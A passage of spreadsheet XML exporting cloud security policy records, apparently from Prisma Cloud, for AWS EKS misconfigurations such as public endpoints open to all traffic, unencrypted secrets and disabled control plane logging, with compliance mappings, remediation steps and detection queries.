          <t>ISO/IEC 27001:2022, HIPAA, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, TX-RAMP Level 2, HIPAA, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), TX-RAMP Level 1, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8.1, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B1874" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1874" s="2" t="inlineStr"/>
      <c r="D1874" t="inlineStr"/>
      <c r="E1874" t="inlineStr"/>
      <c r="F1874" t="inlineStr"/>
      <c r="G1874" t="b">
        <v>1</v>
      </c>
      <c r="H18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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1874" t="inlineStr">
        <is>
          <t>aws-eks</t>
        </is>
      </c>
      <c r="K1874" t="inlineStr">
        <is>
          <t>AWS EKS cluster public endpoint access overly permissive to all traffic</t>
        </is>
      </c>
      <c r="L1874" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1874" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1874" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1874" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1874" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1874" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R1874" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S1874" t="inlineStr"/>
      <c r="T1874" t="b">
        <v>0</v>
      </c>
      <c r="U1874" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1874" t="inlineStr">
        <is>
          <t>aws-eks-describe-cluster</t>
        </is>
      </c>
      <c r="W1874" t="inlineStr">
        <is>
          <t>This policy identifies EKS clusters that have an overly permissive public endpoint accessible to all traffic. When you create a new cluster, Amazon EKS creates an endpoint for the managed Kubernetes API server that you use to communicate with your cluster (using Kubernetes management tools such as kubectl). By default, this API server endpoint accepts all connections from public internet, and access to the API server is secured using a combination of AWS Identity and Access Management (IAM) and native Kubernetes Role Based Access Control (RBAC).
Allowing all traffic to EKS cluster may allow a bad actor to brute force their way into the system and potentially get access to the entire network. As a best practice, restrict traffic solely from known static IP addresses. Limit the access list to include known hosts, services, or specific employees only.</t>
        </is>
      </c>
      <c r="X1874" t="inlineStr">
        <is>
          <t>Either disable public access to your API server so that it's not accessible from the internet and allow only private access, or restrict traffic solely from known static IP addresses.
For more details on Amazon EKS cluster endpoint access control, follow below mentioned URL:
https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html</t>
        </is>
      </c>
      <c r="Y1874" t="inlineStr"/>
      <c r="Z1874" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-eks-describe-cluster' AND json.rule = resourcesVpcConfig.endpointPublicAccess is true and resourcesVpcConfig.publicAccessCidrs contains "0.0.0.0/0"</t>
        </is>
      </c>
      <c r="AA1874" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1874" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1874" t="inlineStr">
        <is>
          <t>PC-AWS-EKS-801</t>
        </is>
      </c>
      <c r="AD1874" t="b">
        <v>1</v>
      </c>
      <c r="AE1874" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1874" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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4" t="inlineStr">
        <is>
          <t>23c2dec8-4eeb-4f32-8960-171f9a266b99</t>
        </is>
      </c>
      <c r="AI1874" t="inlineStr">
        <is>
          <t>68c1a676-8e87-4c3c-a89b-c973453dee89</t>
        </is>
      </c>
      <c r="AJ1874" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1874" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1875">
      <c r="A1875" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, MLPS 2.0, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27002:2013, HITRUST v.9.4.2 [Deprecated], NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ISO/IEC 27002:2013, ISO 27002:2022, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, HITRUST CSF v.11.2.0, NIST 800-53 Rev 5, PCI DSS v4.0, PCI DSS v3.2.1, ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, ISO/IEC 27017:2015, NIST 800-53 Rev4, Telecommunications Security Act - TSA, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, Sarbanes Oxley Act (SOX), ISO/IEC 27002:2013, CIS AWS 3 Tier Web Architecture Benchmark v.1.0.0, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), kashan ACSC Information Security Manual (ISM), CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, ISO/IEC 27018:2019, SOC 2, NIST CSF, ISO/IEC 27001:2022, CSA CCM v.4.0.1, MLPS 2.0 (Level 3), Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CHC HITRUST CSF v.9.6.0, NIST SP 800-172, NIST CSF, kfirdaus AWS Account-CS, ISO 27002:2022, Copy of CIS Controls v8, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), CHC HITRUST CSF v.9.6.0, CSA CCM v.4.0.1, HITRUST CSF v.9.6.0</t>
        </is>
      </c>
      <c r="B1875" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1875" s="2" t="inlineStr"/>
      <c r="D1875" t="inlineStr"/>
      <c r="E1875" t="inlineStr"/>
      <c r="F1875" t="inlineStr"/>
      <c r="G1875" t="b">
        <v>0</v>
      </c>
      <c r="H18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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1875" t="inlineStr">
        <is>
          <t>aws-eks</t>
        </is>
      </c>
      <c r="K1875" t="inlineStr">
        <is>
          <t>AWS EKS cluster using the default VPC</t>
        </is>
      </c>
      <c r="L1875" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1875" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1875" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1875" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1875" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1875" t="inlineStr">
        <is>
          <t>Control Category: 01.0</t>
        </is>
      </c>
      <c r="R1875" t="inlineStr">
        <is>
          <t>01.c</t>
        </is>
      </c>
      <c r="S1875" t="inlineStr"/>
      <c r="T1875" t="b">
        <v>0</v>
      </c>
      <c r="U1875" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1875" t="inlineStr">
        <is>
          <t>aws-eks-describe-cluster</t>
        </is>
      </c>
      <c r="W1875" t="inlineStr">
        <is>
          <t>This policy identifies AWS EKS clusters which are configured with the default VPC. It is recommended to use a VPC configuration based on your security and networking requirements. You should create your own EKS VPC instead of using the default, so that you can have full control over the cluster network.</t>
        </is>
      </c>
      <c r="X1875" t="inlineStr">
        <is>
          <t>An AWS EKS cluster VPC cannot be changed once it is created. To resolve this alert, create a new cluster with the custom VPC as per your requirements, then migrate all required cluster data from the reported cluster to this newly created cluster and delete the reported Kubernetes cluster.
1. Open the Amazon EKS dashboard.
2. Choose Create cluster.
3. On the Create cluster page, fill in the following fields:
- Cluster name
- Kubernetes version
- Role name
- VPC - Choose your new custom VPC.
- Subnets
- Security Groups
- Endpoint private access
- Endpoint public access
- Logging
4. Choose Create.</t>
        </is>
      </c>
      <c r="Y1875" t="inlineStr"/>
      <c r="Z1875" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-eks-describe-cluster' as X; config from cloud.resource where api.name = 'aws-ec2-describe-vpcs' as Y; filter ' $.X.resourcesVpcConfig.vpcId contains $.Y.vpcId and $.Y.isDefault is true'; show X;</t>
        </is>
      </c>
      <c r="AA1875" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1875" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1875" t="inlineStr">
        <is>
          <t>PC-AWS-EKS-382</t>
        </is>
      </c>
      <c r="AD1875" t="b">
        <v>1</v>
      </c>
      <c r="AE1875" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1875" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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5" t="inlineStr">
        <is>
          <t>531d82cd-5d3f-4d2f-ba89-bf3f8f35dab6</t>
        </is>
      </c>
      <c r="AI1875" t="inlineStr">
        <is>
          <t>51f38603-3a0d-47d3-b006-908d7dad40f0</t>
        </is>
      </c>
      <c r="AJ1875" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1875" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1876">
      <c r="A1876" t="inlineStr">
        <is>
          <t>HIPAA, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, SOC 2, DORA, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, SOC 2, HIPAA, CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1876" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1876" s="2" t="inlineStr"/>
      <c r="D1876" t="n">
        <v>0</v>
      </c>
      <c r="E1876" t="n">
        <v>22</v>
      </c>
      <c r="F1876" t="n">
        <v>0</v>
      </c>
      <c r="G1876" t="b">
        <v>1</v>
      </c>
      <c r="H18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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1876" t="inlineStr">
        <is>
          <t>aws-eks</t>
        </is>
      </c>
      <c r="K1876" t="inlineStr">
        <is>
          <t>AWS EKS cluster does not have secrets encryption enabled</t>
        </is>
      </c>
      <c r="L1876" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1876" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1876" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1876" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1876" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1876" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R1876" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S1876" t="inlineStr"/>
      <c r="T1876" t="b">
        <v>0</v>
      </c>
      <c r="U1876" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1876" t="inlineStr">
        <is>
          <t>aws-eks-describe-cluster</t>
        </is>
      </c>
      <c r="W1876" t="inlineStr">
        <is>
          <t>This policy identifies AWS EKS clusters that do not have secrets encryption enabled.
AWS EKS cluster secrets are, by default, stored unencrypted in the API server's underlying data store (etcd). Anyone with direct access to etcd or with API access can retrieve or modify the secrets. Using secrets encryption for your Amazon EKS cluster allows you to protect sensitive information such as passwords and API keys using Kubernetes-native APIs.
It is recommended to enable secrets encryption to ensure its security and reduce the risk of unauthorized access or data breaches.</t>
        </is>
      </c>
      <c r="X1876" t="inlineStr">
        <is>
          <t>To enable secrets encryption on existing Azure EKS clusters, follow the below URL:
https://docs.aws.amazon.com/eks/latest/userguide/enable-kms.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-kubernetes-policies/bc-aws-kubernetes-3
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-kubernetes-policies/bc-aws-kubernetes-3</t>
        </is>
      </c>
      <c r="Y1876" t="inlineStr"/>
      <c r="Z1876" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-eks-describe-cluster' AND json.rule = encryptionConfig does not exist or (encryptionConfig exists and encryptionConfig[*].provider.keyArn does not exist and encryptionConfig[*].resources[*] does not contain secrets)
{"category":"Kubernetes","resourceTypes":["aws_eks_cluster"]}</t>
        </is>
      </c>
      <c r="AA1876" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB1876" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:32</t>
        </is>
      </c>
      <c r="AC1876" t="inlineStr">
        <is>
          <t>PC-AWS-EKS-1114-CKV_AWS_58</t>
        </is>
      </c>
      <c r="AD1876" t="b">
        <v>1</v>
      </c>
      <c r="AE1876" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1876" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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6" t="inlineStr">
        <is>
          <t>46d178fa-fee0-4353-bee5-e953f49f6a67</t>
        </is>
      </c>
      <c r="AI1876" t="inlineStr">
        <is>
          <t>1282a39f-806b-404e-bd79-15e463c5472f</t>
        </is>
      </c>
      <c r="AJ1876" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1876" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1877">
      <c r="A1877" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), ISO 27002:2022, Risk Management in Technology (RMiT), Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, PCI DSS v3.2.1, CIS Controls v8, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, MLPS 2.0, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Telecommunications Security Act - TSA, MAS TRM 2021, PCI DSS v4.0, HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, NIST 800-53 Rev 5, NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], CHC HITRUST CSF v.9.6.0, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.11.2.0, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Risk Management in Technology (RMiT), MLPS 2.0, CHC HITRUST CSF v.9.6.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, HITRUST CSF v.11.2.0, NIST 800-53 Rev4, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v4.0, SOC 2, MLPS 2.0 (Level 3), APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, PIPEDA, Fedramp (Moderate), MLPS 2.0 (Level 3), NIST CSF, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CRI Profile v1.2.1, CSA CCM v.4.0.6, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, DORA, CSA CCM v.4.0.6, HITRUST CSF v.9.6.0, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CHC HITRUST CSF v.9.6.0, NIST CSF v2.0</t>
        </is>
      </c>
      <c r="B1877" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1877" s="2" t="inlineStr"/>
      <c r="D1877" t="inlineStr"/>
      <c r="E1877" t="inlineStr"/>
      <c r="F1877" t="inlineStr"/>
      <c r="G1877" t="b">
        <v>1</v>
      </c>
      <c r="H18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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1877" t="inlineStr">
        <is>
          <t>aws-eks</t>
        </is>
      </c>
      <c r="K1877" t="inlineStr">
        <is>
          <t>AWS EKS control plane logging disabled</t>
        </is>
      </c>
      <c r="L1877" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1877" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1877" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1877" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1877" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1877" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R1877" t="inlineStr">
        <is>
          <t>09.aa</t>
        </is>
      </c>
      <c r="S1877" t="inlineStr"/>
      <c r="T1877" t="b">
        <v>1</v>
      </c>
      <c r="U1877" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1877" t="inlineStr">
        <is>
          <t>aws-eks-describe-cluster</t>
        </is>
      </c>
      <c r="W1877" t="inlineStr">
        <is>
          <t>Amazon EKS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This policy generates an alert if control plane logging is disabled.</t>
        </is>
      </c>
      <c r="X1877" t="inlineStr">
        <is>
          <t>To enable control plane logs:
1. Login to AWS Console
2. Navigate to the Amazon EKS dashboard
3. Choose the name of the cluster to display your cluster information
4. Under Logging, choose 'Manage logging'
5. For each individual log type, choose Enabled
6. Click on 'Save changes' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-kubernetes-policies/bc-aws-kubernetes-4
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-kubernetes-policies/bc-aws-kubernetes-4</t>
        </is>
      </c>
      <c r="Y1877" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'eks:UpdateClusterConfig' permission. Successful execution will enable control plane logging for the respective EKS.",
'impact': 'Enable control plane logging for the respective EKS',
'cliScriptTemplate': 'aws eks update-cluster-config --name $resourceName --region $region --logging \'"clusterLogging":["types":["api","audit","authenticator","controllerManager","scheduler"],"enabled":true]\''</t>
        </is>
      </c>
      <c r="Z1877" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-eks-describe-cluster' AND json.rule =  logging.clusterLogging[*].types[*] all empty or logging.clusterLogging[*].enabled is false
{"category":"Kubernetes","resourceTypes":["aws_eks_cluster"]}</t>
        </is>
      </c>
      <c r="AA1877" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1877" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1877" t="inlineStr">
        <is>
          <t>PC-AWS-EKS-381-CKV_AWS_37</t>
        </is>
      </c>
      <c r="AD1877" t="b">
        <v>1</v>
      </c>
      <c r="AE1877" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1877" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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7" t="inlineStr">
        <is>
          <t>3fe88e1f-79f9-42a0-9fee-e5ae348b7cb0</t>
        </is>
      </c>
      <c r="AI1877" t="inlineStr">
        <is>
          <t>ddc8ccc2-2510-4779-b4ba-756a41214f18</t>
        </is>
      </c>
      <c r="AJ1877" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1877" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1878">
      <c r="A1878" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, ISO/IEC 27001:2022, CSA CCM v.4.0.1, MAS TRM 2021, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27002:2013, MLPS 2.0, HIPAA, NIST 800-53 Rev4, GDPR, NIST 800-53 Rev 5, NIST CSF, NYDFS 23 CRR-NY 500.0, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), Telecommunications Security Act - TSA, ACSC Information Security Manual (ISM), MAS TRM 2021, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), MITRE ATT&amp;CK v8.2 [Deprecated], CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, NIST 800-53 Rev 5, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, CIS Controls v8.1, NIST SP 800-171 Revision 2, NIST CSF v2.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, HIPAA, CIS Controls v7.1, NIST CSF, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, PCI DSS v3.2.1, ISO/IEC 27002:2013, NIST 800-53 Rev4, CSA CCM v.4.0.6, CIS Controls v7.1, SOC 2, ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, TX-RAMP Level 1, NIST SP 800-171 Revision 3, Fedramp (Moderate), Telecommunications Security Act - TSA, Sarbanes Oxley Act (SOX), ISO 27002:2022, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, MPAA Content Protection Best Practices, ISO/IEC 27002:2013, NIST CSF, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, CHC HITRUST CSF v.9.6.0, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, PCI DSS v4.0, SOC 2, kashan ACSC Information Security Manual (ISM), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MPAA Content Protection Best Practices, Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, NIST 800-53 Rev4, SOC 2, NIST 800-53 Rev 5, CSA CCM v.4.0.1, PCI DSS v4.0, CSA CCM v.4.0.1, MLPS 2.0 (Level 3), NIST 800-53 Rev 5, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), APRA (CPS 234) Information Security, CIS Controls v8, ISO/IEC 27002:2013, Copy of CIS Controls v8, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, ITSG-33, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CRI Profile v2.0, NIST CSF, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, TX-RAMP Level 1, GDPR, NIST CSF, SOC 2, NIST CSF, FFIEC, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM),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ISO/IEC 27001:2022, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, PCI DSS v4.0, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B1878" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1878" s="2" t="inlineStr"/>
      <c r="D1878" t="inlineStr"/>
      <c r="E1878" t="inlineStr"/>
      <c r="F1878" t="inlineStr"/>
      <c r="G1878" t="b">
        <v>1</v>
      </c>
      <c r="H18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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1878" t="inlineStr">
        <is>
          <t>aws-eks</t>
        </is>
      </c>
      <c r="K1878" t="inlineStr">
        <is>
          <t>AWS EKS cluster security group overly permissive to all traffic</t>
        </is>
      </c>
      <c r="L1878" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1878" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1878" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1878" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1878" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1878" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1878" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S1878" t="inlineStr"/>
      <c r="T1878" t="b">
        <v>0</v>
      </c>
      <c r="U1878" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1878" t="inlineStr">
        <is>
          <t>aws-eks-describe-cluster</t>
        </is>
      </c>
      <c r="W1878" t="inlineStr">
        <is>
